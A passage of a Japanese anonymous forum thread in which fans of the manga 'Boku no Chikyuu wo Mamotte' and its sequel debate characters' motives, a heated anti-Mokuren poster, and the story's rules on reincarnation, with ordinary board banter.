399 :花と名無しさん:2006/09/10(日) 16:04:03 ID:???0
>>392
第一部で推測すると、健の脳内での2人の役どころは
苺→ 勇者と行動を共にする騎士か魔法使い
氷樹→王女
という所だな。

実は健、2人をモデルにしたゲームの脚本を書いて大当たりしていたりして。

400 :花と名無しさん:2006/09/10(日) 16:41:14 ID:???0
400(σ・∀・)σゲッツ

401 :花と名無しさん:2006/09/10(日) 16:45:20 ID:???0
>>386>>392
健の苺マンセーはウザかったけど、氷樹ハァハァはなぜか許せたw
いくらずっと会ってなかったからって実姉と手繋いで照れるなよと突っ込んでたけど。
そう考えると、夏寿輝×氷樹と健×苺のカポーって、ブラコンシスコン同士でお似合いだよね。
義理の兄弟同士も気が合って上手く行きそうだし。

402 :花と名無しさん:2006/09/10(日) 17:11:05 ID:???0
氷樹がノイズに寄生されればよかったのに。
「健のバージンは私がもらいマース」という路線で。

403 :花と名無しさん:2006/09/10(日) 17:16:47 ID:???0
>>402
夏寿輝の苺ハァハァはキモイだけだったけど、
じゃあ氷樹が健ハァハァだったら萌えたかというとこれまた微妙w
何となく日渡さんは女の積極的キャラは苺辺りで限界って感じ(自分から可愛くちゅーどまり)。
一成×桜のカポーは桜が責めっぽいけど、具体的な描写はまるまるカットされてるし。

404 :花と名無しさん:2006/09/10(日) 17:45:18 ID:???O
X00ゲッツとかいい加減ウザイ。

405 :花と名無しさん:2006/09/10(日) 17:55:09 ID:???0
目玉えぐるのなんか素手でもできるしw
その前に暢気に恋愛ボケしてる貴様の急所ひきちぎるのなんか
非力な人間にもわけないしww

406 :花と名無しさん:2006/09/10(日) 18:27:27 ID:???0
>>404
2chの風物詩みたいなもんにイチャモンつけても仕方なかろw

407 :花と名無しさん:2006/09/10(日) 18:32:45 ID:???O
>>404
こういうのはスレ住人じゃない奴がやってる
(スレ一覧があるでしょ)のだから、ここで言っても意味なし

408 :花と名無しさん:2006/09/10(日) 20:28:30 ID:???0
紫苑と木蓮の十代の頃のビュジュアルが大好きだ
一回並んでカラーで描いて欲しかったな

409 :花と名無しさん:2006/09/10(日) 21:07:05 ID:???0
>>401
実は2人が育った境遇も大差がないという事もあって急激に恋に落ちたかも知れないよ。
鈴鳴家は両親が共働き+放任主義で末っ子の苺の子育ては長男の夏寿輝任せだったけど
氷樹は父親不在の他に、母親も多忙で留守がちだったという事ぐらいありそう。

>>402
健タイムスリップ編の次は、ボブがノイズに寄生される→氷樹を拉致・軟禁する
と予想していたが見事にハズレタ。

まんまラスト近くの亜梨子と輪だけど。

410 :花と名無しさん:2006/09/10(日) 23:18:20 ID:???O
妹に「変態!」と言葉責めされる一成萌え。

411 :花と名無しさん:2006/09/10(日) 23:55:57 ID:???O
僕地球久しぶりに読み返したんだけど
紫苑が木蓮に泣きながら告白する場面
「口実が必要だったんだあんたを抱くのに
オレは単に」ていうとこが何回読んでもいまいち良く分からんというか
初めて読んだのが小学生だったから理解できなくて
その時の印象が強くてモヤモヤする
寂しさをアピールするための口実ってこと?

412 :花と名無しさん:2006/09/11(月) 00:02:41 ID:???0
>>411
紫苑が木蓮に素直に「愛してる」と言えないって事じゃないかと…
成長過程で他人を信じる事が普通ではなかった紫苑が
誰かに惹かれたとしても、それを言葉に出すのが屈辱的って言うか…。

木蓮が紫苑を許したのも、そういった紫苑の心情を
理解した…という風にビワタリはしたかったんじゃないかなぁ?
そういう説明描写が少な杉だけどねw

413 :花と名無しさん:2006/09/11(月) 05:11:11 ID:???0
>>411-412
でも木蓮は紫苑の寂しさは理解出来ても、
自分を愛してくれてた事までは見抜けなかった所が
すれ違いの悲劇なんだよね。
あの辺の言葉選びは上手かったなあと。
「あんたじゃなくて誰でも良かったハズだ」も、
紫苑は「好きだからあえてあんたを選んだ」と言いたかったのに、
木蓮は「たまたま私が選ばれてしまっただけなのね」と解釈してたっぽいし。

414 :花と名無しさん:2006/09/11(月) 10:30:30 ID:???0
二人きりの時間がいっぱいあったから誤解なんか解けそうだったのにもどかしーヽ(`Д´)ノ

415 :花と名無しさん:2006/09/11(月) 13:05:08 ID:???0
>>413
なるほど・・・・
411じゃないけど、私もやっと意味が分かった・・。

私も、
>木蓮は「たまたま私が選ばれてしまっただけなのね」と解釈してたっぽいし
木蓮と同じように解釈してたので、意味が分かってなかった。
あのへんもっと、紫苑の心情の描写でフォローがほしかったな・・。
私みたいに鈍感読者のために・。


416 :花と名無しさん:2006/09/11(月) 14:10:33 ID:???0
スレ違いだけど、ぼく球が連載されていた頃の人気漫画だったグリーンウッド作者が
今ではボーイズラブ作家まで堕ちてしまった現状を考えると
絵は変わってもこうして少女漫画を描き続ける日渡はカッコイイと思う

417 :花と名無しさん:2006/09/11(月) 14:54:11 ID:???O
>>416
那州さんはウィングスで「魔法使いの娘」と言うフツーの少女漫画を連載してる。
(コミクス4巻まで出ている)

それにBLを貶めるのはイクナイ(・∀・)!
確かに801な内容だけど、少女漫画とは違う面白さがどっかにあるから
市場が広がってるんだろうし(想像だけど…)。

418 :花と名無しさん:2006/09/11(月) 15:00:21 ID:???0
>>416
自分BLは苦手なんでそっちの世界良くは知らんが
那州雪絵はマイナーだが普通の少女漫画も描いてて
今でもかなり面白いよ 
自分も日渡は大好きだけど他作家「堕ちた」と貶めてまで
マンセーせずともいいじゃないか 




419 :花と名無しさん:2006/09/11(月) 15:02:16 ID:???O
連投スマソだが…
グリーンウッドは流し読みでハマらなくて、日渡信者の自分が断言するけど
現状ならボク月より魔法使いの娘の方が、面白いと‘個人的には’思っている。
スレ違いすまん。

420 :418:2006/09/11(月) 15:02:37 ID:???0
リロらずにレスしたら>>419と被ってしまった すまんかった

421 :花と名無しさん:2006/09/11(月) 15:04:39 ID:???O
417=419でした…ちょっと熱くなり杉たな…。

422 :418:2006/09/11(月) 15:15:34 ID:???0
>>420
>リロらずにレスしたら>>419と被ってしまった すまんかった
                ↑
               >>417の間違いです 重ね重ねスンマセンorz


423 :花と名無しさん:2006/09/11(月) 18:24:51 ID:???0
那須雪絵さんは堕ちたのではなく、新境地を開いたんだよ。

>>402
>健のバージンは私がもらいマース

ジャスミン・アレンの声を当てはめてしまったよ。
苺の声は変と言われていたけど、どんな声かな?すごくハスキーか
ピンクの電話の清水美子の様なキンキン声か。

424 :花と名無しさん:2006/09/11(月) 19:25:47 ID:???0
那須さんだったら、グリーンウッド連載中に星矢の801同人誌出したりしてたよ。
もともとBL属性のある人。

425 :花と名無しさん:2006/09/11(月) 20:30:05 ID:???O
411です
紫苑が木蓮の事あの時点で好きだって気付いたって事ですよね??
私はあの時点ではまだ好きになっていなくてあの後から好きだと自覚して行くのかと思ってました
だからただ素直に懺悔するシーンなのかと思ってました
何だか色んな捉え方があるなぁと勉強になります

426 :花と名無しさん:2006/09/11(月) 20:44:13 ID:???0
>>374
それじゃありすが紫苑の生まれ変わりになっちゃうよ…


427 :花と名無しさん:2006/09/11(月) 21:28:04 ID:???0
>>413だけど、色々な意見を聞くと自分の解釈に自信がなくなってきたw
確かに紫苑のセリフだけ聞くと、木蓮を心身共に傷つけた事や、
両想い(と紫苑は思っている)の玉と引き離して悪かったという懺悔にも思えるんだよね。
木蓮が選ばれたのもたまたま憎んでるキチェスだったからという理由付けも出来るし。

私が紫苑が自分の気持ちに気付いてたと判断したのは、
「俺は何を待ってるんだ」と「ただ単にあの女と寝たかったのか?」の部分かな。
まあ紫苑も男だから相手がエンジュでもシュスランでも襲う事は可能だったろうけど、
その場合は罪悪感だけ感じて↑の二つの感情は生まれなかったんじゃないかと。

428 :花と名無しさん:2006/09/11(月) 21:35:17 ID:???0
俺の脳内で苺のキャストは村田秋乃。

429 :花と名無しさん:2006/09/11(月) 21:36:13 ID:???0
改めてボクタマ読んだけど木蓮って最悪最低だな〜

・絶世の美女
・一億人に一人の超人キチェス
・聡明で美しい歌声
・美しい楽園育ち
・国から一生を保障された勝ち組

これほどまでに恵まれているのに不幸面するところがムカツク
メンバーとの顔合わせで柊を変な顔と罵ったり、顔だけで玉や
紫苑へ取り入ろうとケーキを焼いて媚を売ったり見ててイライラした。
歌ったら植物が成長して大変なことになるって知ってるくせに
何度も何度も歌って皆に迷惑かけるし、傲慢もいいところ。
エンジュの気持ちを知りながら、玉をキープ扱いして弄んでいたのにも
ハァ?と思ったが、きっと自分のことしか考えてない自己中なんだろうね。
モードも木蓮の男漁りや妙な反発心のせいで仕事で最低の評価をされるし、
月基地で弄ばれた男メンバー全員が不幸になるし、こいつさえいなければ
皆が幸せになれたのかと思うとやりきれないわ。
大体にして美人で不幸で超能力者で聡明で・・・って、こんな女に感情移入できないっつーの

430 :花と名無しさん:2006/09/11(月) 21:39:22 ID:???0
木蓮だって人間ですよ

431 :花と名無しさん:2006/09/11(月) 21:44:49 ID:???0
コピペ?????
429のレス、そう何日も経過してないのに特にラスト2行を見た記憶がある。
私怨でもあるんだろうか………漫画のキャラなのに。

432 :花と名無しさん:2006/09/11(月) 21:51:55 ID:???0
外から見て恵まれてても本人には満たされない何かがある、というのが木蓮のテーマでしょ。

それだけマンガのキャラにムカついたりするってのはそんだけはまり込んで
ボクタマ読んでたって事にもなるんだろうけど。

433 :花と名無しさん:2006/09/11(月) 22:54:02 ID:???0
>>429がどれほど不細工な顔と平凡な性格と厳しい生活環境に悩んでるのかは知らないが
どれほど恵まれてるように見えても人間なんだから不平不満はでるだろうさ。
それこそ、アフリカだかどこだかの餓死寸前の子供からしてみれば日本なんて楽園そのものだが
そんな場所でも自殺する人間もノイローゼになる人間もいる。

つーかそもそも、木蓮について>>429が挙げた特徴って、何一つとして木蓮自身が勝ち取ったものじゃないし。
本人は友人のパパンを救えなかったり、恩人が星と一緒に吹っ飛んだり、
基地に勤務してもあまり役に立たなかったりと、あまり成功した経験はない。

434 :花と名無しさん:2006/09/11(月) 23:20:05 ID:???0

【ただの作品やキャラ批判というより、
 キャラに自分の恨みつらみをぶつけて憂さ晴らししてるような人】

は、スルーしましょう。
相手にしないのが吉。
自分まで気分悪くなっちゃうからねb


435 :花と名無しさん:2006/09/11(月) 23:50:31 ID:???0
>>433
そういえば、木蓮が自他共に「自力で成功した」と胸を張っていえるような業績ってほとんどないな。
せいぜい、キチェスとして勉学に励んだことと輪を土壇場で助けたことくらいか。

436 :花と名無しさん:2006/09/12(火) 00:09:40 ID:???0
そうそう。木蓮ってチヤホヤされてる割に
全然役に立ってないんだよねぇ
あれで不細工だったら紫苑も玉も木蓮はアウトオブ眼中だったと思う
つーか木蓮もどうかと思うけどアリスの方が酷い。
輪が瀕死で輪ママパパが苦しんでいる時に、迅八と一成のヤオイを
妄想して興奮してる変態だし、自分が苦しい事をアピールしまくるくせに
春や他の人が苦しめられていてもまるで無関心だったしね

437 :花と名無しさん:2006/09/12(火) 00:22:30 ID:???0
ああ何かまた始まった感じ。壊れたレコードみたいに何度も繰り返さなくていいよ。

438 :花と名無しさん:2006/09/12(火) 00:23:21 ID:???0
作品ってどの角度から読んでもかまわないと思うなー。
ヒロインに自分投影しながら読まなきゃならん(義務・決まり)、ってもんではない。
玉が好き、輪が好き、春が好き、秋が好き…何でもありだ。

ビワタリさんは、たぶんここまで大ヒットして、長期化する予定のなかった連載を
だんだんノリノリになって追加設定した部分が少なからずある。
(人気が出たので、編集から引き伸ばしを要求されたり、本人もやる気になったかも?)
ちょっと辻褄あわなかったり、キャラが途中から役割変えた部分も
あったんではないかと思う。

しかし、続編として連載し始めたからって、紫苑と木蓮の守護天使って言うの
やめてくれ!>ボク月。
ヘタれたとわかってても一応読んでる身だが、守護天使として登場する度に
泣きそうだよ。ヒァーとか言う変なネーミングの猫イメージを使って
キャーみたいな巨大猫が他人の夢に登場したり…。簡便して、ホント。
蓮くん自身や友達の成長は、見ていてほのぼのできるんだけど、
両親キャラと守護天使がホントダメダメ。

439 :花と名無しさん:2006/09/12(火) 00:25:41 ID:???0
>>437
仕方ないよメンヘラと認知症は

440 :花と名無しさん:2006/09/12(火) 00:59:49 ID:???0
木蓮アンチすごいな
それも妬み丸出しなのが凄い

441 :花と名無しさん:2006/09/12(火) 01:10:08 ID:???0
最近はむしろこの木蓮アンチを見るのが楽しみですらあるw
非の打ち所がない美女ってこういうやっかみを受けるんだなーと思って見てるよ
(個人的に木蓮はあまり好きではないが)

442 :花と名無しさん:2006/09/12(火) 01:39:29 ID:???0
私は木蓮みたいな女性には憧れるけど…
やっぱり美人は妬み買いやすいって本当なんだね

443 :花と名無しさん:2006/09/12(火) 01:53:52 ID:???0
木蓮は完璧美女じゃない後半部分が面白かったけどな
ありすは出来の悪い子がだんだん成長しているよくある少女漫画キャラだと思ったけど

444 :花と名無しさん:2006/09/12(火) 05:21:01 ID:???O
ぬっちゃけ>>436にちょっと共感。
輪が死にかけてるのに、ありすのあれは不謹慎すぎと思った。

大人になって読み返してみたら、輪ママもおかしい。
いくら意識が戻ったからと言っても、マンションから落とされて何日も意識不明だったのに
「全然怒ってない、むしろ謝りたい」ってケロッと
……あり得ない。
意識が戻ったところで、どんな障害が残るかわからないのに。
坂口家からキッチリ慰謝料とって引っ越すのが普通だと思う。
ありすの顔なんか一生見たくないはず。よく結婚許したよね。

重箱の隅ごめん、スルーしていいよ。

445 :花と名無しさん:2006/09/12(火) 06:39:41 ID:???0
マンガですから。

446 :花と名無しさん:2006/09/12(火) 08:51:02 ID:???0
マンションから落とされてっていうけど、輪だっけ全然悪くないわけじゃないよね。輪ママは輪の意識が戻った後、その事に気がついいたんじゃないのかな。
やっぱり子供だから?子供のころの記憶だけど、何だかずっとひっかかってます。


447 :花と名無しさん:2006/09/12(火) 08:51:04 ID:???0
木蓮アンチ=メンヘルでFA
キティなんだから放置しとけ

448 :花と名無しさん:2006/09/12(火) 08:55:37 ID:???O
>>446
メル欄は入れないほうがいいよ〜

449 :花と名無しさん:2006/09/12(火) 09:07:14 ID:???0
悔しいかい?
悔しいなら 不幸になっちゃダメだぞ
絶対だ

450 :花と名無しさん:2006/09/12(火) 09:22:50 ID:???0
うーん、親の立場としたら故意ではないにしろかなりの過失があったのだし、
子供が大怪我したことには変わりがないのだから、
慰謝料なりなんなりもらって顔も見たくないって気持ちになるだろうけど。
でもその一番の被害者の子供が「もうありすを責めないで。その方が悲しくなるから」と
言ったらやっぱり許さざるを得ないのじゃないのかな。

そう考えると一番不可解なのが輪だったりして。
いくら自分の勝手な行動が原因で、自分を引っぱたいて落とした近所のお姉ちゃんが
前世での恋人だからって、簡単に許した上にそれを盾に婚約しようとする?
現世の記憶や意識だって多少はあるのだし、落とされたトラウマとか残りそうな物だけど。

451 :花と名無しさん:2006/09/12(火) 09:34:10 ID:???O
慰謝料っても輪側にこれだけ非がある&
被害者を踏み付けて人権を叫ぶ加害者大国日本じゃたかが知れてると思う
まあこのケースなら輪ママも妥当では

452 :花と名無しさん:2006/09/12(火) 11:22:00 ID:???0
>>449
君がすこしずつ不幸から脱していけたら
今度はその時に褒美のキスを一つずつあげよう

ラズローッ。゚(゚´Д`゚)゜。

453 :花と名無しさん:2006/09/12(火) 11:37:41 ID:???O
確かに不幸から脱してるよな…

他人様に大迷惑かけて

454 :花と名無しさん:2006/09/12(火) 12:41:27 ID:???0
>>453
自分がこれまで誰にも迷惑をかけずに生きてこれたとでも思ってるわけ?

455 :花と名無しさん:2006/09/12(火) 12:50:46 ID:???0
悔しくて顔真っ赤にして泣いてる>>453の姿が見えるようです

456 :花と名無しさん:2006/09/12(火) 12:55:04 ID:???0
なんでそんなにつっかかってんのか知らんが・・
>>453は、「誰にも迷惑かけずに生きてきた」なんて一言も言ってないと思うが?

輪が「大」迷惑をかけたという話をただしてるだけであって・・。
>>454は木蓮アンチと同一人物?
他人を攻撃して憂さ晴らしするとこがよく似てる。




457 :花と名無しさん:2006/09/12(火) 12:56:20 ID:???0
>>454>>455か。


458 :花と名無しさん:2006/09/12(火) 13:17:11 ID:???0
なんか盛り上がってた?乗り遅れて(´・ω・`)ショボン

459 :花と名無しさん:2006/09/12(火) 15:46:40 ID:1nbFl3Ez0
>>444
輪母は大親ばかのDQNなので(甘やかされて育った輪もDQN)、
輪を落とした→ありす殺す!
輪が「ありすを責めないで」→ごめんなさいありすちゃん
と輪の操り人形状態になっている・・・と解釈しますた。
つーか変といえばあの件に関わる全員が変。
植木鉢落とされて逆上するありすも大人げなさ過ぎ。

460 :花と名無しさん:2006/09/12(火) 16:02:54 ID:???0
物語の展開上しょうがないけど変なところはイパーイあるけどね
あそこでは植物がどうより植木鉢を落として下の人に当たったらどうする・・・と怒るべきなんで

461 :花と名無しさん:2006/09/12(火) 16:39:13 ID:???O
さらに言うなら
あそこから小学生落として下にいる人に当たったらどうすんのよ!

462 :花と名無しさん:2006/09/12(火) 17:44:30 ID:???0
まあ作者自身がメンヘルだからしょうがないw

463 :花と名無しさん:2006/09/12(火) 17:52:11 ID:???0
細かい事を言えば落としたのは植木鉢ではないがな。

464 :花と名無しさん:2006/09/12(火) 18:04:13 ID:???0
>>423
健が「すごい可愛い声」、大吾が「すっとんきょうな声」と言ってるので、
カン高いアニメかアイドルのぶりっ子声を想像してた。
具体的な例えは出来ないけど。
そのような声で脳内変換して苺初登場のシーンや、
全をとっ捕まえていじめてた(?)シーンを想像すると結構笑えるw
夜子を慰めるなどの真面目なシーンではやりづらいのが難点だけど。

465 :花と名無しさん:2006/09/12(火) 21:18:16 ID:???0
まぁ漫画の中で好きな人物と嫌いな人物が最低2人いたら成功だって(だっけ?)
日渡先生も言ってるし・・・

466 :花と名無しさん:2006/09/12(火) 22:47:07 ID:???0
川原泉スレで見つけました。

312 :花と名無しさん :2006/09/10(日) 08:45:44 ID:???0
>311
それって階級によるんじゃね?
イギリス語って、大雑把に
1:クイーンズ(王族・貴族階級)
2:BBC(所謂標準語的なもん?
3:オックスブリッジ
4:中流階級
5:コクニー(ロンドンの労働者階級)江戸弁みたいなもん?←オージーはこれ
ってな感じに分けられるとオモ
それぞれアクセントや言い回しが特徴的だけど、アメリカで冗談にされてるのは
クイーンズやオックスブリッジの木で鼻をくくった感じの気取った話し方なのかな?

俺の知り合いは米語は、やたら巻き舌で名古屋弁っぽいって言ってた。


氷樹達が話していた英語はどれかな?



467 :花と名無しさん:2006/09/12(火) 23:00:41 ID:???0
5:コクニー(ロンドンの労働者階級)江戸弁みたいなもん?←オージーはこれ

468 :花と名無しさん:2006/09/13(水) 01:25:52 ID:???0
お、オージー……?wwww

469 :花と名無しさん:2006/09/13(水) 02:02:27 ID:???0
>>468
オーストラリア人では?オージービーフって言い方あるじゃん。

470 :花と名無しさん:2006/09/13(水) 13:02:46 ID:ebMdNTi/0
無知はほっとけ>469

471 :花と名無しさん:2006/09/13(水) 14:39:42 ID:???0
そういや英語が苦手な自分には下町出身のベッカムの方が雨英語よりはずっと聞き取りやすかったな
教科書っぽいからか


472 :花と名無しさん:2006/09/13(水) 15:11:25 ID:???0
たかが漫画にリアリティを求めるメンヘラーが募っていると聞いてやってきました

473 :花と名無しさん:2006/09/13(水) 15:16:35 ID:???O
ん?
メンヘラーがなにをつのっているの?


あとニュー速からコピペ


 12日午後2時20分ごろ、北九州市門司区の市営住宅4階に住む女性(28)から、
ベランダにいた長男(3)が屋外に転落したと119番があった。長男は命に別条はなく、
右足の親指を骨折するなどのけがを負った。

 門司署の調べでは、ベランダの手すりは、高さ約1.2メートル。長男が手をかけて
滑らせた痕跡があったという。

 女性は長男を1人でベランダで遊ばせ、近所に買い物に行った。帰宅後に長男が
いなかったため捜したところ、団地内の軟らかい土でできた通路に転落し、座った
状態の長男を見つけたという。

http://www.zakzak.co.jp/top/2006_09/t2006091319.html

474 :花と名無しさん:2006/09/13(水) 15:37:22 ID:???0
なんで三歳児を放置してでかけるかね。馬鹿親ですか。
と、マジレスしてみる。

475 :花と名無しさん:2006/09/13(水) 19:50:57 ID:???O
売れなくなった作家は過去で売れた作品の続編を出すってパターンに見事にハマってるな
そして昔のファンは幻滅し消えていくという

476 :花と名無しさん:2006/09/13(水) 20:58:47 ID:???0
>>471
むしろクイーンズの方が「口をもごもごさせた様な」発音で聞き取りにくいんだって。

ベッカムの妻のビクトリアも(実家は金持ちだけど)夫と同じ労働者階級で、
周囲に「いくら上流のお嬢ぶっていても、アクセントや仕草ですぐに分かるんだよ」
と言う目で見られているらしいよ。

477 :花と名無しさん:2006/09/13(水) 22:51:22 ID:???0
付け焼き刃な表層的な知識でまあごくろーさんw

478 :花と名無しさん:2006/09/14(木) 03:36:08 ID:???0
まあすべてをひっくるめて言うと木蓮嫌い。
この女の身勝手で紫苑はえらい迷惑こうむって、イカレポンチだし。
基地に一人残すなら、自分の氏に間際に頃してやれよ。
そして仲良くお手てつないで氏にゃよかったんだよ。
それが武士の情けよ。

二人きりでいた間、愛してる〜☆とかいくらでも言う機会はあったろうに、
匂わせる出来事もあったろうに、なんでわからんかなトンチキばかっぷるは。
一体なにしてたんだか。草むしりか?

479 :花と名無しさん:2006/09/14(木) 03:55:38 ID:???0
つ【結界石】

480 :花と名無しさん:2006/09/14(木) 04:04:50 ID:???0
誰かチラシの裏を持ってきてやってくれ

481 :花と名無しさん:2006/09/14(木) 04:45:25 ID:???0
>>478
自殺したら生まれ変われないのなら紫苑殺して、自分が
病気で死ねばよかったと思う今日この頃。

482 :花と名無しさん:2006/09/14(木) 05:19:05 ID:???O
殺人犯は自殺より罪が軽いの?
シオンが「殺してくれ」と高瀬舟ったなら自殺同様だから転生できなさそうだし。
シオンの不意をついて殺ったらそれはそれで現世で輪が超トラウマで夢でうなされる。
つか、いつから転生前提になったんだ?
自殺したら転生できないからだめよ、って言い残したのも、言ってみたら寝言じゃん。
漫画読んでる私らにはわかるが、本人らには転生するかどうか普通わかんないでしょ。
あの星でだって、転生して前世の記憶がある人とかいなかったじゃん。
木蓮のドリームに何故最後だけ付き合う?
それまでは「地球の大気になりたいのォー ゲロゲロww」と馬鹿にしまくっていたのに

483 :花と名無しさん:2006/09/14(木) 06:06:02 ID:???0
仏教思想関係ない異星人の考える転生なのでそこら辺は深く考えても駄目ぽ

484 :花と名無しさん:2006/09/14(木) 07:44:26 ID:???0
重箱突き

485 :花と名無しさん:2006/09/14(木) 08:04:00 ID:???O
地獄突き

486 :花と名無しさん:2006/09/14(木) 10:08:29 ID:???0
>>482
確か作中ではどうして自殺だと転生出来ないかの説明はなかったと思うけど、
罪の重い軽いは関係なく、自分で生きる事を放棄したから
それで魂も傷付き転生出来ないって事では。

だから殺人を犯そうがどんなに重い犯罪を犯そうが、
本人に転生したいという強い意志があり、自殺さえしなければ転生出来ると。

487 :花と名無しさん:2006/09/14(木) 10:31:08 ID:???0
>>482
どこを縦読み?

488 :花と名無しさん:2006/09/14(木) 11:59:44 ID:???O
>>478みたいなのはもうおなかいっぱい。

489 :花と名無しさん:2006/09/14(木) 12:57:53 ID:???0
マンガの世界では「自殺したら転生できない」ってのは結構ありがちな設定だよ…。
(仏教からでた思想なのかどうかは知らないが)

490 :花と名無しさん:2006/09/14(木) 14:05:31 ID:???0
転生について。

ヒンドゥー教においては、今世において発生したカルマ、消化できなかったカルマを
再度消化するために輪廻転生すると言われているが、自殺によって転生できないと
言うわけではない。自殺によって魂は傷付かない、代わりにカルマが発生し、
来世においてより過酷な運命が待っているだけ(つまり来世を望んで自殺しても、
待っているのは今よりももっと辛い世界)

仏教においては、人は死後迷いが残っていた場合、六道に落ち、このうちで
人間道・畜生道に落ちた場合はこの世に転生するといわれている。自殺した場合、
もっと下位に堕ちるため、この世には転生できないが、精進して魂を洗い清めれば
また人間道に戻ってくることも可能。

スピリチュアリズムにおいては、人間は必ず人間へと転生してくるが、そのサイクルは
数百年に及ぶ。

フリーメーソンにおいては、前世において魔術的活動を行っていた者は転生後も必ず
その道を歩むとしており、フリーメーソンのメンバーは来世、かならずフリーメーソンに
戻ってくると言われる。その時、自殺などでカルマを受けても強制的にカルマを
オールリセットする技術を持っているため、カルマの作用は一切受けない。

以上、イタい内容で読んでムカついた人ごめんです。

491 :花と名無しさん:2006/09/14(木) 14:09:58 ID:???0
因みにカルマをリセットする技術は神社などでも持っています。
例えば某神社ではカルマ=龍とし、強いカルマに縛られている人を霊験新たかな地にて
修行させ、カルマを和らげて自力で消化していけるように導いています。

492 :花と名無しさん:2006/09/14(木) 15:19:45 ID:???0
イカレポンチだの、トンチキって…いったいいつの時代の人なんだろ。
しかも真夜中に…

493 :花と名無しさん:2006/09/14(木) 21:25:59 ID:???0
「自殺したら転生できない」が正しいか正しくないかなんてどうでもいいんだが…
それこそマンガのありがちな設定だし
ムキになってる人ってほんとに何なの?

494 :花と名無しさん:2006/09/14(木) 21:45:16 ID:???0
ホラー漫画家 永久保貴一の「永久保怪異談」でぼく球の
話が出てくるとは思わなかった。

495 :花と名無しさん:2006/09/14(木) 22:25:31 ID:???0
生に執着したシウなら、母星が消滅しても月基地に居て生き残った奇跡を
嘆くよりも喜ぶべきだろう。

496 :花と名無しさん:2006/09/14(木) 23:47:29 ID:???0
それも微妙
実際問題9年間もずっと1人で生き続ける(しかも人種として)
なんて凄い恐怖だと思う。
自分だったら無理。
死にたくないけど一人で生き続けるなんて無理。

497 :花と名無しさん:2006/09/15(金) 00:16:36 ID:???0
>>496
死の恐怖の前にシウは宇宙で孤独に生きる辛さを
予想できてなかったんだろうね。
で、感染発覚後に嘆きに嘆いて頭が冷えたところで
孤独の恐ろしさに気付いたとw
来世で酷い目にあったけど田村やミクロという味方がいたし、
何だかんだでラッキーな奴だ

>>494
kwsk

498 :花と名無しさん:2006/09/15(金) 05:56:41 ID:???0
>>497
奥さんが中学生の時、ぼく球がはやってて友達の彼氏が、自分達は
前世の仲間だと言って中学生の女の子を集めていたそうだ。
奥さんを水の巫女だと言い雨を降らせたり(霊能力者にとっては簡単な事だそうです。
永久保さんにも出来たそうです。)して、結局はその周りに集まってた女子中学生全てと
関係を持ってたらしい。奥さんは何かおかしいと被害には合わなかったそうですが。
ちなみに男は当時19歳。

499 :花と名無しさん:2006/09/15(金) 10:18:07 ID:???0
どっかの宗教の教祖みたいだな・・・

500 :花と名無しさん:2006/09/15(金) 10:32:17 ID:???0
500(σ・∀・)σゲッツ

501 :花と名無しさん:2006/09/15(金) 11:09:34 ID:???O
>>498
いまいち意味が掴めない

502 :花と名無しさん:2006/09/15(金) 13:07:38 ID:???0
>>501
永久保奥さんが中学の時、友達の彼氏が前世での仲間と称して女子たちを集め、
不思議な力を見せて信じさせてその女子たちとヤリまくったけど、
奥さんは疑ってたのでヤラなかった、って事じゃない?
そもそも何で前世の仲間だからって、彼女持ちの男とヤル必要があるのか理解に苦しむけど。

まあ奥さんも被害に遭ってたら、旦那としてそんな事公表出来ないよね。
被害届け出しても和姦にされてしまう可能性も高いだろうし。

503 :498:2006/09/15(金) 15:55:22 ID:???0
>>502
フォローありがとうございます。大体その通りです。
ただ、雨を降らせたのは永久保先生の奥さんですが、これは
永久保先生自体が霊能者の指導の下出来た様に誰にでも
出来るそうです。奥さんは確かに霊感体質だそうですが
>498にあった様に「キミは前世で僕のパーティにいた水の巫女だ」
と言って指導をして少女達の前で、雨を降らせて信用させていたようです。
その最初に出てきた友達は奥さんが説得して抜け出させたそうです。
結局、自分のハーレムを作ってたそうです。
集まってきた中学生の女の子たちみんなに手を付けちゃって。

504 :追記:2006/09/15(金) 16:06:31 ID:???0
奥さんは、「なんか変だぞ 前世の仲間だっていうだけのつながり方
っておかしいよ・・この人たち気味悪い・・・」と感じたそうですが。

505 :花と名無しさん:2006/09/15(金) 16:22:31 ID:???0
「この世には不思議な物など何一つないのだよ、関口君」

京極堂にはまっていればトリック検証推理大会になったのにね

506 :花と名無しさん:2006/09/15(金) 17:33:34 ID:???0
都合よく私の妻だけはやられてませんでした、というのも胡散臭いがな。
まあ現在処女で嫁入る人間なんて0なんだから気にもしてないだろうけど。

507 :花と名無しさん:2006/09/15(金) 20:10:09 ID:7c5kpdaV0
ぼく月を本屋で見つけた時は
嬉しくて仕方なかった。

絵もまあ今風?になっちゃったんだろな
って思えて普通に読めたし。
むしろ大人になった輪くん見れて嬉しかった。

ここに来て色んな意見を見て
成程と思った、ありがとうです。

ぼく球次世代編、記憶鮮明を
期待してるんだけど・・無理かな。

508 :花と名無しさん:2006/09/15(金) 20:10:52 ID:???0
ごめんさげ忘れた・・
逝ってきます

509 :花と名無しさん:2006/09/15(金) 20:13:47 ID:???0

ゴキブリを叩き出せ

510 :ダンゴムシ ◆BALLUUXz0U :2006/09/15(金) 21:07:18 ID:???0
([[[[[)<ちょっまっ・・・ゴキブリちゃうって

511 :花と名無しさん:2006/09/16(土) 21:12:35 ID:???0
>>507
蓮ではなくカチコを主人公にしてくれれば、期待できるかも知れないけれど。

512 :花と名無しさん:2006/09/17(日) 05:48:07 ID:???0
「ぼくの〜」読んで色んな感想も読んでみたけど、
玉や迅八って嫌われてんなーw

男だから知らんが、紫苑とかに比べればむしろ大分マシに見えたわ。
漫画的にカコイイのは紫苑だったが。でかい猫いいな。
まぁでも、話と設定そのものは面白かった。

513 :花と名無しさん:2006/09/17(日) 08:36:06 ID:???0
少女漫画では熱血漢とか変に真っ直ぐすぎるキャラってあまり好かれないと思う。
玉はその真っ直ぐさが時にうっとおしい、という描かれ方もしたと思うし。

514 :花と名無しさん:2006/09/17(日) 09:17:46 ID:???0
少女マンガはとても特殊で閉鎖的な世界だからね。
だからエロ以外は段々と衰退していってる。

515 :花と名無しさん:2006/09/17(日) 09:27:52 ID:???O
少女漫画は、言語化できない心情表現が好き放題出来るメディアだと思う
読者の私たちがそれを読み取れなくなって来るときが衰退なんじゃないかなぁ?
(聞き流していいよ)

516 :花と名無しさん:2006/09/17(日) 09:28:30 ID:???0
少女漫画だからなのか?少年漫画でのめり込んで読んだ作品が
某作家だけだから比較しようもないが、
ぼく地球での玉は、キャラとして底が浅い人間描写されていたから
嫌われてしまうのは仕方ないと思ったが…。
